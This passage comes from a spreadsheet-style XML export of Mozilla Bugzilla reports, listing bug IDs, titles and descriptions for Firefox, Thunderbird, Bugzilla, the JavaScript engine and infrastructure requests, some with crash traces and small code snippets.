c. try to access that address again you'll see the address encrypted in the suggestion panel.</t>
  </si>
  <si>
    <t>FIREFOX-479189</t>
  </si>
  <si>
    <t>weave does not sync tag smart folders properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
Build Identifier: 0.2.100
Tag smart folders are empty on second computer
Reproducible: Always
Steps to Reproduce:
Test Case:
0. Delete all data from weave server
1. Start Firefox with new profile 1
2. Install Weave
3. Create a bookmark with an assigned tag
4. Open Bookmarks Organizer and drag the tag to the Bookmarks toolbar to create a tag smart folder
5. Sign-in and sync with Weave
6. Exit Firefox
7. Start Firefox with new profile 2
8. Install Weave
9. Sign-in and sync with Weave
Actual Results:  
The bookmark has properly sync'd but the tag smart folder in the Bookmarks Toolbar is empty.
Expected Results:  
The tag smart folder in the Bookmarks Toolbar should work and display the bookmark with the tag when clicked.
This is possibly related to Bug 444601
I use tag smart folders extensively to organize my bookmarks. I refuse to go back to regular folders )</t>
  </si>
  <si>
    <t>FIREFOX-432380</t>
  </si>
  <si>
    <t>Remove openHelpMac.commandkey and hardcode modifiers</t>
  </si>
  <si>
    <t>spinning off from bug 432112.
openHelpMac.commandkey and openHelpMac.modifiers are not needed now.
And openHelpMac.frontendCommandkey and openHelpMac.frontendModifiers should be renamved.</t>
  </si>
  <si>
    <t>CORE-210128</t>
  </si>
  <si>
    <t>Lists with Roman numerals don't fail gracefully for large numbers</t>
  </si>
  <si>
    <t>The algorithm for numbered lists with Roman numerals in nsBulletFrame.cpp only
works up to 3999. Higher numbers display garbage.
(All other values for list-style-type either fall back to decimal above some
value or go on producing numerals in the same system up to MAXINT32. I can't
vouch that *every* system is working correctly but there is no obvious garbage
except in the cases of upper-roman and lower-roman)</t>
  </si>
  <si>
    <t>FIREFOX-396136</t>
  </si>
  <si>
    <t>Two tooltips displayed for location bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a7) Gecko/2007080210 GranParadiso/3.0a7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a7) Gecko/2007080210 GranParadiso/3.0a7
When there is a long address in the location bar it's possible to display two tooltips at the same time - one for the address itself and the 'drag and drop this icon...' tooltip.
Reproducible: Always
Steps to Reproduce:
1. Visit a page with a long URL
2. Roll the mouse over the location bar
3. Move the mouse to the page icon
Actual Results:  
A tooltip for the page address is displayed then a second tooltip is displayed on top of the first.
Expected Results:  
One tooltip at a time please!</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-498732</t>
  </si>
  <si>
    <t>Mouse request</t>
  </si>
  <si>
    <t>Hi Sean
Can I please have this (http://www.cdw.com/shop/products/default.aspx?EDC=1044064 Microsoft Wireless Laser Mouse 5000) mouse for my computer?  If this model is not an option can you please let me know what is?
Thanks</t>
  </si>
  <si>
    <t>CORE-452340</t>
  </si>
  <si>
    <t>TM: knownNative for num_toString</t>
  </si>
  <si>
    <t>Created attachment 335651
fix
Patch here. Easy for zero-args (radix 10) case thanks to pre-existing FASTCALL js_NumberToString. Helps fannkuch already in my testing.
/be</t>
  </si>
  <si>
    <t>CORE-265988</t>
  </si>
  <si>
    <t>prepare nsSVGDocument for sr</t>
  </si>
  <si>
    <t>The files nsSVGDocument.h and nsSVGDocument.cpp need improved before this can
happen. Things I address in my upcomming patch are:
1) remove nsString.h and nsIURI.h from nsSVGDocument.h
2) remove nsIDOMClassInfo.h nsIHttpChannel.h nsReadableUtils.h and nsCOMPtr.h
from nsSVGDocument.cpp
3) make GetDomain return a null string when appropriate
4) make GetURL return a null string when appropriate
5) simplify GetRootElement's to reduce footprint
6) make NS_NewSVGDocument not warn on NS_ERROR_OUT_OF_MEMORY
7) make NS_NewSVGDocument return nsnull on failure
8) add attribute IDL comments and generally structure the file to be consistent
with the rest of the SVG code</t>
  </si>
  <si>
    <t>THUNDERBIRD-520971</t>
  </si>
  <si>
    <t>Aero - Spell-check toolbar button moves/shifts/jumps upwards on hover</t>
  </si>
  <si>
    <t>The spell-check toolbar in the message compose window button shifts upwards by 1px or so on hover.</t>
  </si>
  <si>
    <t>CORE-523118</t>
  </si>
  <si>
    <t>we mistake 'cell' and text' xul tree seltypes for multiselects</t>
  </si>
  <si>
    <t>Created attachment 407044
first pass
Spun off from Neil's catch: bug 414302 comment 42. We should at least do this in nsXULTreeAccessible.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-411101</t>
  </si>
  <si>
    <t>Prepare Website for Firefox 2 Telugu (te)</t>
  </si>
  <si>
    <t>Here is what we need for Web localization :
a/ translation of the in-product pages
b/ translation of the google snippets for the start page (depends on Google
supported languages to be  determined with them)
c/ optional but nice to have : Mozilla Developper Center in Telugu
Points a/ and b/ are mostly a one-shot work points c/ is a long term
commitment to the project that require maintenance.
c/ does not block the shipping of Firefox 2 in Telugu to be precise.</t>
  </si>
  <si>
    <t>CORE-245571</t>
  </si>
  <si>
    <t>Cannot cancel keydown events when key combination is in use by Mozilla need to cancel keypress instead</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040506 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040506 Firefox/0.8
When catching the keydown event through an event listner it is impossible to
cancel the event and have it not propegate up to the Mozilla GUI layer if the
key combination is bound to a Mozilla shortcut. Even though the event *should*
be cancelable ( even e.cancelable is true ) the Mozilla action happens anyway.
This is making it impossible to develop a browser-based application that wants
to make use of any key combinations Mozilla deeps appropriate to commandeer.
I am also constantly having problems with Find as you type taking over *every*
kepress. It seems to also be impossble to cancel through the DOM.
Reproducible: Always
Steps to Reproduce:
window.addEventListener(keydown function (e) {
    if( e.keyCode == 80 &amp;&amp; e.ctrlKey )
    {
        alert( This should *not* bring up the printer menu because
e.cancelable ==  + e.cancelable )
        e.stopPropagation()
        e.preventDefault()
    }
} false )
Actual Results:  
Printer dialog appears anyway.
Expected Results:  
The DOM event should be canceled and nothing should happen.</t>
  </si>
  <si>
    <t>oliver_yeoh</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-469029</t>
  </si>
  <si>
    <t>Switch instances of web site with website</t>
  </si>
  <si>
    <t>After a very important discussion that took priority over everything else we have decided use the term website over web site where applicable in the knowledge base. :-)
The style guide will need to be updated.
Only exceptions are when referring to labels in the Firefox UI.</t>
  </si>
  <si>
    <t>CORE-386265</t>
  </si>
  <si>
    <t>Using double-hashing for atoms.</t>
  </si>
  <si>
    <t>During the browser startup until the default page is shown the JS engine allocates about 15000 atoms for strings. Running GMail brings that number to 26000.
Currently each atom means an extra malloc call since the engine uses chained hash table and represents atoms as hash table entries.
It would be nice to avoid these 15K malloc calls and switch the table to double hashing which is also more cache friendly.
The basic idea is to use jsval itself as a property id with string and double properties interned through the hashing.
The nontrivial part of this schema is how to deal with hidden properties. Since hidden properties are strings a possible solution for the problem is to tag them as booleans with an added benefit of very simple conversion between hidden and normal properties.</t>
  </si>
  <si>
    <t>CORE-367907</t>
  </si>
  <si>
    <t>allow printing to PDF file on gtk2-cairo</t>
  </si>
  <si>
    <t>(Not sure this is the correct component maybe -&gt; Widget::Gtk ?)
Printing to file always prints to a PS file. That's because sDeviceContextSpecGTK::GetSurfaceForPrinter always creates a PS surface:
442 #ifdef USE_PDF
443   gfxPDFSurface *surface = new gfxPDFSurface(path gfxSize(w h))
444 #else
445   gfxPSSurface *surface = new gfxPSSurface(path gfxSize(w h))
446 #endif
and USE_PDF is undefined.
In Epiphany I want to offer the choice to print to a PS or PDF file so I need a programmatic switch here not a compile time option.
Attached patch implements this by adding a new attribute outputFormat to nsIPrintSettings with values kOutputFormatPS|PDF.</t>
  </si>
  <si>
    <t>BUGZILLA-181589</t>
  </si>
  <si>
    <t>Add mass-group-edits to editgroups</t>
  </si>
  <si>
    <t>To assist admins with sites moving from old (2.16 and prior) groups to the new
implicit groups where regexps are continuously applieed editgroups needs some
new functions.
1) Remove all explicit memberships from this group
2) Remove all explicit memberships who are covered by the regexp from this group
Naturally both of these need a very serious confirm screen.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-31168</t>
  </si>
  <si>
    <t>Dont linkify all numbers</t>
  </si>
  <si>
    <t>When you view the CVS checkins all numbers in descriptions are linified to 
show_bug.cgi.
This should not be the case of the words: I18N and L10N!</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-523961</t>
  </si>
  <si>
    <t>reboots (Thursday October 22nd edition)</t>
  </si>
  <si>
    <t>talos-rev2-linux01
talos-rev2-linux07
talos-rev2-linux09
talos-rev2-linux13
talos-rev2-linux17
talos-rev2-xp02
talos-rev2-xp20</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-481304</t>
  </si>
  <si>
    <t>Add functionality to import/upload l10n priority and metric data into tiki db for l10n dashboard</t>
  </si>
  <si>
    <t>The core of the new l10n dashboard is getting data that's currently hand/script tabulated into the new tiki db table. We'll need a script or admin page to import this data.
Currently Laura is talking with IT for suggestions (ease of use and sustainability of solution).
In the meantime if we could attach a sample of what we would be pulling it it'd provide a good start.</t>
  </si>
  <si>
    <t>CORE-351328</t>
  </si>
  <si>
    <t>Crash [@ nsCSSRendering::PaintBackgroundWithSC] with colspan=0</t>
  </si>
  <si>
    <t>This testcase causes a scary crash.  In a debug build the memory address accessed looks random (NOT something like 0xdddddddd or 0xdadadada).  Examples: 0xff9c8020 0x653b3261.
Stack trace:
0    nsCachedStyleData::GetStyleData(nsStyleStructID const&amp;) + 92 (nsRuleNode.h:215)
1    nsStyleContext::GetStyleData(nsStyleStructID) + 52 (nsStyleContext.cpp:221)
2    nsIFrame::GetStyleData(nsStyleStructID) const + 108 (nsIFrame.h:591)
3    nsIFrame::GetStyleDisplay() const + 36 (nsStyleStructList.h:95)
4    nsCSSRendering::PaintBackgroundWithSC(nsPresContext* nsIRenderingContext&amp; nsIFrame* nsRect const&amp; nsRect const&amp; nsStyleBackground const&amp; nsStyleBorder const&amp; nsStylePadding const&amp; int nsRect*) + 176 (nsCSSRendering.cpp:2902)
5    TableBackgroundPainter::PaintCell(nsTableCellFrame* int) + 572 (nsTablePainter.cpp:599)
...</t>
  </si>
  <si>
    <t>CORE-384706</t>
  </si>
  <si>
    <t>[FIX]Searching text in xml pretty print doesn't work anymore</t>
  </si>
  <si>
    <t>To reproduce:
- Press Ctrl-F
- Search for ab for instance
It should find that text but that doesn't happen anymore in current trunk builds.
This regressed on trunk between 2007-02-28 and 2007-03-01:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-02-28+04&amp;maxdate=2007-03-01+08&amp;cvsroot=%2Fcvsroot
I think a regression from bug 372086 somehow.
Note that this didn't work without problems though see bug 263049.</t>
  </si>
  <si>
    <t>CORE-192322</t>
  </si>
  <si>
    <t>Calling nsDocShell::GetDocument creates about:blank document if called when doc doesn't exist</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0.0) Gecko/20020530
Build Identifier: trunk
If a call is propagated down to nsDocShell::GetDocument via the embedding apis
(like nsIWebNavigation::GetDocument()) and no document is loaded yet nsDocShell
creates an about:blank document.  Is this proper behavior for what appears to
be an accessor function?  Rather than change the state of the object shouldn't
it just return null if no document exists?  
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>NancySumner1</t>
  </si>
  <si>
    <t>TOOLKIT-409179</t>
  </si>
  <si>
    <t>Inconsistent autoresume state causes download manager instantiation to fail (can lead to crash)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b2) Gecko/2007121120 Firefox/3.0b2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b2) Gecko/2007121120 Firefox/3.0b2
Every time I try to download something Firefox jest crashes I've reinstalled it twice now nothing works. It happened after i switched around the download locations in the options pannel.
Reproducible: Always
Steps to Reproduce:
1.Change download location a few times
2.Click on any download
3.Watch as Firefox dies
4.Open Explorer and download with it
Actual Results:  
you get the file with Explorer and not Firefox and Firefox dies
Expected Results:  
downloaded the file &lt;- I hope
No add-ons not themes
I'm using Xp pro sp2
Intel Core 2 Duo
Nvidia 8800Gts</t>
  </si>
  <si>
    <t>Roberthollar1990</t>
  </si>
  <si>
    <t>CORE-13100</t>
  </si>
  <si>
    <t>idl compiler is okay with multiple interfaces but build chokes</t>
  </si>
  <si>
    <t>okay i have an interfaces that's defined like this:
[scriptable uuid(a6d22202-622b-11d3-82ef-0060b0eb596f)]
interface nsIXPCTestChild4 : nsIXPCTestParentOne nsIXPCTestParentTwo {
	attribute string ChildAttribute
	string ChildMethod()
}
i ran it through the xpidl compiler and it compiled with no errors and was
able to generate a valid header file.
however my build fails with this error:
xpctest_multiple.idl:49: Error: ERROR: more than one parent interface for
nsIXPCTestChild4
so do we support it or not? if not maybe the xpidl compiler should complain.</t>
  </si>
  <si>
    <t>cbegle</t>
  </si>
  <si>
    <t>CORE-450139</t>
  </si>
  <si>
    <t>TM: LOAD_INTERRUPT_HANDLER must respect recording (crash in 3d-cube and 3d-raytrace)</t>
  </si>
  <si>
    <t>Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x0008f30b in isPromoteInt ()
(gdb) bt
#0  0x0008f30b in isPromoteInt ()
#1  0x00091bde in TraceRecorder::set ()
#2  0x00092b4d in TraceRecorder::stack ()
#3  0x00093a06 in TraceRecorder::record_LeaveFrame ()
#4  0x0003a37e in js_Interpret ()
#5  0x0004025f in js_Execute ()
#6  0x0000884a in JS_ExecuteScript ()
#7  0x00002210 in Process ()
#8  0x00005aab in main ()</t>
  </si>
  <si>
    <t>CALENDAR-326003</t>
  </si>
  <si>
    <t>Move brand.dtd and brand.properties to locales</t>
  </si>
  <si>
    <t>We originally added brand.dtd.in and brand.properties in sunbird/app since Firefox did the same. Firefox has long moved their branding files to the locales directory. We should be following the same path.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-494262</t>
  </si>
  <si>
    <t>re-spin mozilla-1.9.1 05-21 nightlies using changeset 11e0fd20fde9</t>
  </si>
  <si>
    <t>Please &amp; thank you.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-223703</t>
  </si>
  <si>
    <t>nederlandgaatdigitaal.nl - Page does not render</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031007
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031007
Mozilla only displays some javascript that is included in this page.
It looks like a comment-problem. Mozilla thinks that the comment has
ended but it isn't.
Reproducible: Always
Steps to Reproduce:
1. goto http://www.nederlandgaatdigitaal.nl
2.
3.</t>
  </si>
  <si>
    <t>keeskuip</t>
  </si>
  <si>
    <t>CORE-500912</t>
  </si>
  <si>
    <t>Remove splitter realTimeDrag</t>
  </si>
  <si>
    <t>Created attachment 385563
fix
In nsSplitterFrame.cpp realTimeDrag is always 1. Removing the dead code for the realTimeDrag==0 case removes some code that might create a widget.</t>
  </si>
  <si>
    <t>THUNDERBIRD-321254</t>
  </si>
  <si>
    <t>contacts sidebar leaks ldap connections</t>
  </si>
  <si>
    <t>If you open the contacts sidebar in a compose window and leave it open and do an ldap search we don't close the ldap connection when the compose window closes. We do close it if you close the sidebar however. Fix upcoming that closes the ldap connection and clears the search input when the compose window is closed. This is all because of the compose window caching.</t>
  </si>
  <si>
    <t>CORE-935273</t>
  </si>
  <si>
    <t>[B2G][Browser] Some web pages are reloaded after using the Gallery picker to upload images</t>
  </si>
  <si>
    <t>Created attachment 827681
Video of Facebook reloading after picking an image to upload.
Description:
Some web pages that allow the user to upload an image to the website are reloaded after the user selects an image using the Gallery picker. This was tested with the mobile version of Facebook and Twitter and the desktop version of Flickr all reloading after picking an image.
Repro Steps:
1) Update Buri to v1.2 COM RIL BuildID: 20131103004003
2) If needed take a picture using the Camera app
3) Launch the Browser
4) Navigate to Facebook (www.facebook.com)
5) Sign into a test Facebook account
6) Select Photo at the top of the page to upload an image
7) Select Browse &gt; Gallery &gt; pick an image
8) Comfirm the image selection (box with a check mark)
Actual:
Facebook page reloads to the page that first appeared when signing in.
Expected:
The chosen image displays on the webpage where the user can then post it onto Facebook.
Environmental Variables:
Device: Buri v1.2 COM RIL
BuildID: 20131103004003
Gaia: cb981e2f47bc644b4d178d54378c3676c946facf
Gecko: eec4da1b27eb
Version: 26.0
RIL Version: 01.01.00.019.276
Notes:
Repro frequency: 5/5
Link to failed test case: https://moztrap.mozilla.org/manage/case/8909/
See attached: PageReload.3gp &amp; LogCat</t>
  </si>
  <si>
    <t>dflanagan</t>
  </si>
  <si>
    <t>mvaughan</t>
  </si>
  <si>
    <t>CORE-260980</t>
  </si>
  <si>
    <t>Clicking a link in a table make a scrollbar appear unexpectedly</t>
  </si>
  <si>
    <t>Clicking a link in a horizontally constrained table will create an horizontal
scrollbar unexpectedly.
Mozilla 1.8a4 build 2004092104 under XP Pro SP2 here.
The css rule involved is:
table {width: 92% margin-left: 4% margin-right: auto}
If I replace margin-right: auto with margin-right: 4% then no scrollbar
is created when clicking the link.
Reduced testcase is coming up.</t>
  </si>
  <si>
    <t>CORE-321021</t>
  </si>
  <si>
    <t>Unable to get exceptions from JS_EvaluateScript and friends</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X zh-tw) AppleWebKit/416.12 (KHTML like Gecko) Safari/416.13
Build Identifier: 
One should be able to use JS_IsExceptionPending() to check if the context contains uncaught exceptions after JS_EvaluateScript is called.  However the uncaught exceptions are reported as error by the LAST_FRAME_CHECKS macro.  Being reported as error means the embedder has no way accessing the raw exception object.  Attached is an example.
Reproducible: Always
Steps to Reproduce:
Compile the test script and run.  Expected to see returning false 1 rahter than returning false 0</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-482112</t>
  </si>
  <si>
    <t>|xpcshell/head.js:160: Error: cannot open file '/buildbot/linux-comm-central-check/build/mozilla/mailnews/test/resources/mailDirService.js' for reading|</t>
  </si>
  <si>
    <t>There are
{
Found 14 matching lines in 14 files 
}
with code is like
{
do_import_script(../mailnews/test/resources/mailDirService.js)
}
except
{
/mailnews/mime/test/unit/head_mime.js
    * line 2 -- do_import_script(mailnews/test/resources/mailDirService.js)
}</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-434407</t>
  </si>
  <si>
    <t>I need access to ldap.mozilla.org</t>
  </si>
  <si>
    <t>I'd like to reuse the same cert that I use for cvs.</t>
  </si>
  <si>
    <t>BUGZILLA-315566</t>
  </si>
  <si>
    <t>choose-classification.html.tmpl incorrect bugzilla tag causes errors</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322 InfoPath.1 .NET CLR 2.0.50727)
Build Identifier: Internet Explorer
in choose-classification.html.tmpl the 1.0@bugzilla.org  tag is a standard html comment tag rather than a template toolkit comment. This causes the  to be inserted as the first tag in the html document. In my case it affected some css styles I am using to add a few links to the banner section. Changing the tag to a template toolkit comment solved the problem.
Reproducible: Always
Steps to Reproduce:
1. add some links to the banner style them with css
2. looks fine on every page
3. go to the select classification section and the link styles are messed up
Actual Results:  
the link text is miniscule
Expected Results:  
link text should have looked the same as it does on every other page in bugzilla</t>
  </si>
  <si>
    <t>marc.fessler</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-251020</t>
  </si>
  <si>
    <t>Email security-group@mozilla.org whenever security bug is filed</t>
  </si>
  <si>
    <t>We need custom code for b.m.o. to CC security-group@mozilla.org (on the initial
email only) when a bug is filed in the security group. While we are there we
may as well do the same for security@bugzilla.org and the Webtools security group.
Ideally the security group would also get the email which is sent out whenever
that bit is removed from a bug so they can see anyone making security bugs public.
Gerv</t>
  </si>
  <si>
    <t>TOOLKIT-312846</t>
  </si>
  <si>
    <t>Pressing Enter when a UI-link is focused inside a wizard advances the wizard</t>
  </si>
  <si>
    <t>While working on bug 311288 I noticed the following behavior:
1. Either in the Update Found page or in the Ready To Install page focus the
Details link.
2. Press Enter.
Results: 1) The link is activated (desired). 2) the wizard advances.
In the Ready to Install page the side-effect is a restart of the application.</t>
  </si>
  <si>
    <t>CORE-505158</t>
  </si>
  <si>
    <t>Resource selection/fetch algorithm fails when container has unsupported data format</t>
  </si>
  <si>
    <t xml:space="preserve">
Because Wave is a supported container resource selection algorithm passes this file to the Wave decoder which subsequently fails because the Wave contains MP3 data.
According to the spec we should try the next source and successfully select win_with_vorbis.ogg in this case:
Resource fetch algorithm step 3:
If the media data can be fetched but is found by inspection to be in an unsupported format or can otherwise not be rendered at all:
   1. The user agent should cancel the fetching process.
   2. Abort this subalgorithm returning to the resource selection algorithm.
As these steps do not abort the resource selection algorithm the following steps from step 4 of the Resource selection algorithm should execute:
  5. Run the resource fetch algorithm with the absolute URL that resulted from
      resolving the URL given by the candidate element's src attribute relative 
      to candidate. If that algorithm returns without aborting this one then
      the load failed.
   6. Queue a task to fire a simple event called error at the candidate element.
   7. Return to the step labeled search loop.
Right now the decoders don't have a way to signal that they have failed to decode.  That's bug 481057.  Fixing this bug probably involves fixing bug 485288 as well (and they may well be dupes).</t>
  </si>
  <si>
    <t>MOZILLA_LABS-373130</t>
  </si>
  <si>
    <t>Server RSS View</t>
  </si>
  <si>
    <t>There should be a RSS view from the Joey server.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-206080</t>
  </si>
  <si>
    <t>server password pop-up dialog text box isn't masked!</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030507
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.4b) Gecko/20030507
Could we have the server password pop-up dialog masked please :)
****** instead of just plain text.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>m.sibson</t>
  </si>
  <si>
    <t>CORE-523170</t>
  </si>
  <si>
    <t>Electrolysis: Shared memory tracking</t>
  </si>
  <si>
    <t>Tracking the shmem TODOs.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-404459</t>
  </si>
  <si>
    <t>remove static index.html from MDC root</t>
  </si>
  <si>
    <t>devmo's landing page is out of sync with /en/docs/Main_Page and it appears the cron job that grabbed it and put a copy in /index.html on giles is not running.
it's now being served with header Last-Modified: Tue 21 Aug 2007 17:11:55 GMT
The most noticeable affect is that devnews stories are stale (3 consecutive posts that don't share a category)
This could of course be fixed with a redirect (internal or external) if load is not a concern.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-284149</t>
  </si>
  <si>
    <t>A lack of secure servers on a network when using ircs:// urls should give a better error message</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.6) Gecko/20050223 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.6) Gecko/20050223 Firefox/1.0.1
When connecting to a network using /attach ircs://foonet/ while the network
does not have any servers capable of making a secure connection returns
Connection attempts exhausted giving up which is non-descriptive of the
actual problem (there's not an ssl-enabled server in the network as far as
ChatZilla knows)
Reproducible: Always
Steps to Reproduce:
1. /attach ircs://moznet/
2. Get a weird message about connection attempts being exhausted without any
notice of any connection attempts being actually tried / made.
3. Get confused
Actual Results:  
I did not know what happened to cause the connection to fail and had to resort
to pulling apart the javascript code behind ChatZilla to find out -).
Expected Results:  
It should have displayed a message that the network did not have any servers
capable of making a secure connection.</t>
  </si>
  <si>
    <t>CORE-363214</t>
  </si>
  <si>
    <t>nsIAccessible::TakeFocus() doesn't move focus properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061208 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061208 Minefield/3.0a1
If a text entry area inside an HTML form has focus using the AT-SPI calls to setCaretOffset on some other component (e.g. a caret) should relieve that text area of its focus and position the caret where it was told to go.  Right now an assistive technology can only programmatically move the caret outside a text area by forcing focus to some other focusable thing (e.g. another text area).
See also https://bugzilla.mozilla.org/show_bug.cgi?id=363198 for related discussion of setCaretOffset.  
Reproducible: Always</t>
  </si>
  <si>
    <t>DIRECTORY-120406</t>
  </si>
  <si>
    <t>can't use more than 127 threads with SSL or NSPR</t>
  </si>
  <si>
    <t>If an application tries to use more than 128 LDAP session handles with SSL or
when using the PRLDAP layer (always used with SSL) the application will crash
inside libprldap.
The root of the problem is that we are using the NSPR thread-private data
interface incorrectly. Instead of allocating one NSPR thread-private data index
for each LDAP session handle we need to allocate one NSPR thread-private data
index for all of libldap (or at least all of libprldap).</t>
  </si>
  <si>
    <t>TOOLKIT-243324</t>
  </si>
  <si>
    <t>Download manager fails to close with files that download very quickly (small files / cached files)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040503 Firefox/0.8.0+ (Darkstar)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040503 Firefox/0.8.0+ (Darkstar)
When downloading small files Download Manager tends to not close.  I think this
is because it finishes downloading the file before I have a chance to save
(since it starts downloading before being given a save to location) so DM
doesn't get whatever flag it's supposed to get telling it the download is
finished and the window should be closed.
Reproducible: Always
Steps to Reproduce:
1. Download a small (~30k) file
2. Choose Save To location
Actual Results:  
Download Manager shows the download as complete when it pops up and the window
remains open.
Expected Results:  
It should have closed the window upon seeing no active downloads.
This has occured with nightlies over the last few weeks.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-195965</t>
  </si>
  <si>
    <t>custom headers omit \r</t>
  </si>
  <si>
    <t>the implementation I did for multiple custom headers introduced a bug as the
headers are terminated with \n and not \r\n
Sendmail &amp; postfix seem to handle this gracefully (even though its wrong) but
qmail aparantly refuse to accept the mail (see URL)</t>
  </si>
  <si>
    <t>teilo+bugzilla</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-477081</t>
  </si>
  <si>
    <t>Painting glitches on Firefox 3.0.5 (?) for Ben</t>
  </si>
  <si>
    <t>When we fired up the editor today for Ben it was rendering some lines weird on some paints. It looks as though it would pain with extra spacing between letters and would then shoot back. Check browsers.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-655365</t>
  </si>
  <si>
    <t>new component for toolbox</t>
  </si>
  <si>
    <t>toolbox is a new web service/application from the Automation + Tools team.  It needs a new component (Toolbox) under the Webtools product.  The description should be an index of Mozilla software tools</t>
  </si>
  <si>
    <t>NSPR-106372</t>
  </si>
  <si>
    <t>Need PR_strtok_r()</t>
  </si>
  <si>
    <t>We _urgendly_ need a NSPR version of strtok_r().
Some code already uses strtok_r() and strtok().
But the first one is not available on all platforms we support (per cls) and the
2nd one (strtok()) should be avoided in multithreaded apps. as it is not
thread-safe on all platforms.
Patch in bug 100069 has a version of strtok_r(). Just grab it and rename it to
PR_strtok_r() ... :-)</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-435484</t>
  </si>
  <si>
    <t>Add ability to change password</t>
  </si>
  <si>
    <t>There is currently no way to change the Weave password.  It should be possible to do so.</t>
  </si>
  <si>
    <t>CORE-133761</t>
  </si>
  <si>
    <t xml:space="preserve"> operator has always zero width</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.9) Gecko/20020310
BuildID:    2002031008
Mozilla renders  as nothing (probably an
empty frame). This is not what you expect when you apply a function to an atomic
unparenthesized argument such as a variable. (If the argument is non-atomic it
is of course up to you to parenthesize it properly.)
Reproducible: Always
Steps to Reproduce:
1. Browse to the sin x test in the W3C MathML test suite:
http://www.w3.org/Math/testsuite/Presentation/TokenElements/mi/mi2.xhtml
2.
3.
Actual Results:  There is no space between function name sin and its argument x.
Expected Results:  There is some (maybe thin or medium) math space between the two.
The current treatment of  is fine (and desirable) if a function
is applied to a parenthesized expression (f 
x). But if a function is applied directly to a variable:
sinx
or to a result of another function:
arcsin 
sinx
a thin or medium space should appear in place of .
I use PC/Linux version of Mozilla but I believe this bug is architecture
independent.</t>
  </si>
  <si>
    <t>kluka</t>
  </si>
  <si>
    <t>MARKETING-213655</t>
  </si>
  <si>
    <t>press coverage tracker / reviewer hall of fame</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030715 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030715 Mozilla Firebird/0.6
we should have a database where we let user submit new stories about Mozilla
and a subset of that gets added to a reviewers hall of fame. And at all time we
feature the 5 most recent hall of fame reviews on the mozilla.org homepage
(just simple links).  
This could be set up by a volunteer using Squishdot or some other existing tool
and hosted offsite (on mozdev for instance) - we'd just pick up the top 5 via
RSS syndication.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-220536</t>
  </si>
  <si>
